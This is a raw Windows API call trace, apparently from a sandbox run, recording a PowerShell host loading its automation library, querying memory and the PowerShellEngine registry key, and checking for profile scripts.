	[0056.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.624] GetLastError () returned 0xcb
	[0056.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.648] GetLastError () returned 0xcb
	[0056.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.649] GetLastError () returned 0xcb
	[0056.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.649] GetLastError () returned 0xcb
	[0056.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.649] GetLastError () returned 0xcb
	[0056.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.685] GetLastError () returned 0xcb
	[0056.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.685] GetLastError () returned 0xcb
	[0056.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.685] GetLastError () returned 0xcb
	[0056.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.685] GetLastError () returned 0xcb
	[0056.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.685] GetLastError () returned 0xcb
	[0056.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0056.685] GetLastError () returned 0xcb
	[0056.685] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0056.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.686] GetLastError () returned 0xcb
	[0056.690] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0056.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.716] GetLastError () returned 0xcb
	[0056.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.717] GetLastError () returned 0xcb
	[0056.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.719] GetLastError () returned 0xcb
	[0056.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.723] GetLastError () returned 0xcb
	[0056.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.726] GetLastError () returned 0xcb
	[0056.727] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0056.729] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0056.770] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.770] GetLastError () returned 0xcb
	[0056.800] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0056.805] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.805] GetLastError () returned 0xcb
	[0057.009] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x396018
	[0057.010] GetLastError () returned 0x0
	[0057.011] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x3960a0
	[0057.011] GetLastError () returned 0x0
	[0057.163] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.246] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.248] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.249] VirtualQuery (in: lpAddress=0x22c1c4, lpBuffer=0x22d1c4, dwLength=0x1c | out: lpBuffer=0x22d1c4*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.303] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.303] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.303] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.303] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.303] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.304] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.304] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.304] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.304] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.304] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.304] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.304] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.304] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.305] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.305] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.305] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.305] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.305] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.305] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.305] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.305] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.306] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.306] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.306] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.306] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.306] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.306] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.306] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.307] VirtualQuery (in: lpAddress=0x22cb10, lpBuffer=0x22db10, dwLength=0x1c | out: lpBuffer=0x22db10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.308] GetLastError () returned 0xcb
	[0057.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.313] GetLastError () returned 0xcb
	[0057.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d90c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.313] GetLastError () returned 0xcb
	[0057.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.313] GetLastError () returned 0xcb
	[0057.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.313] GetLastError () returned 0xcb
	[0057.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.313] GetLastError () returned 0xcb
	[0057.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d90c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.350] GetLastError () returned 0xcb
	[0057.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.350] GetLastError () returned 0xcb
	[0057.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.350] GetLastError () returned 0xcb
	[0057.350] VirtualQuery (in: lpAddress=0x22ce38, lpBuffer=0x22de38, dwLength=0x1c | out: lpBuffer=0x22de38*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d90c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.351] GetLastError () returned 0xcb
	[0057.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.351] GetLastError () returned 0xcb
	[0057.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0057.351] GetLastError () returned 0xcb
	[0057.351] VirtualQuery (in: lpAddress=0x22ce30, lpBuffer=0x22de30, dwLength=0x1c | out: lpBuffer=0x22de30*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.351] VirtualQuery (in: lpAddress=0x22cae4, lpBuffer=0x22dae4, dwLength=0x1c | out: lpBuffer=0x22dae4*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.352] VirtualQuery (in: lpAddress=0x22cae4, lpBuffer=0x22dae4, dwLength=0x1c | out: lpBuffer=0x22dae4*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.353] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e56c | out: phkResult=0x22e56c*=0x32c) returned 0x0
	[0057.353] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e5b4, lpData=0x0, lpcbData=0x22e5b0*=0x0 | out: lpType=0x22e5b4*=0x1, lpData=0x0, lpcbData=0x22e5b0*=0x56) returned 0x0
	[0057.353] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e5b4, lpData=0x3c3520, lpcbData=0x22e5b0*=0x56 | out: lpType=0x22e5b4*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e5b0*=0x56) returned 0x0
	[0057.354] RegCloseKey (hKey=0x32c) returned 0x0
	[0057.354] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e56c | out: phkResult=0x22e56c*=0x32c) returned 0x0
	[0057.354] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e5b4, lpData=0x0, lpcbData=0x22e5b0*=0x0 | out: lpType=0x22e5b4*=0x1, lpData=0x0, lpcbData=0x22e5b0*=0x56) returned 0x0
	[0057.354] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e5b4, lpData=0x3c3520, lpcbData=0x22e5b0*=0x56 | out: lpType=0x22e5b4*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e5b0*=0x56) returned 0x0
	[0057.354] RegCloseKey (hKey=0x32c) returned 0x0
	[0057.355] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3c3520 | out: pszPath="C:\\Users\\2XC7u663GxWc\\Documents") returned 0x0
	[0057.355] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents", nBufferLength=0x105, lpBuffer=0x22e104, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents", lpFilePart=0x0) returned 0x1f
	[0057.355] GetLastError () returned 0x3f0
	[0057.355] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3c3520 | out: pszPath="C:\\Users\\2XC7u663GxWc\\Documents") returned 0x0
	[0057.356] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents", nBufferLength=0x105, lpBuffer=0x22e104, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents", lpFilePart=0x0) returned 0x1f
	[0057.356] GetLastError () returned 0x3f0
	[0057.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x22e19c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0057.357] GetLastError () returned 0x3f0
	[0057.357] SetErrorMode (uMode=0x1) returned 0x1
	[0057.357] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22e61c | out: lpFileInformation=0x22e61c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0057.357] GetLastError () returned 0x2
	[0057.357] SetErrorMode (uMode=0x1) returned 0x1
	[0057.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x22e19c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0057.357] GetLastError () returned 0x2
	[0057.357] SetErrorMode (uMode=0x1) returned 0x1
